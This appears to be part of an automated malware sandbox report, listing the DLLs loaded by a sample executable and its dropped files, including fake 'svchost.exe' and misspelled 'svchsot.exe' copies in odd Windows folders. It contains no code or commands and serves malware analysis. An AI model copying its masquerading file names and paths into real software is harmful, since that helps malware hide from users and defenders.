Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvfw32.dll
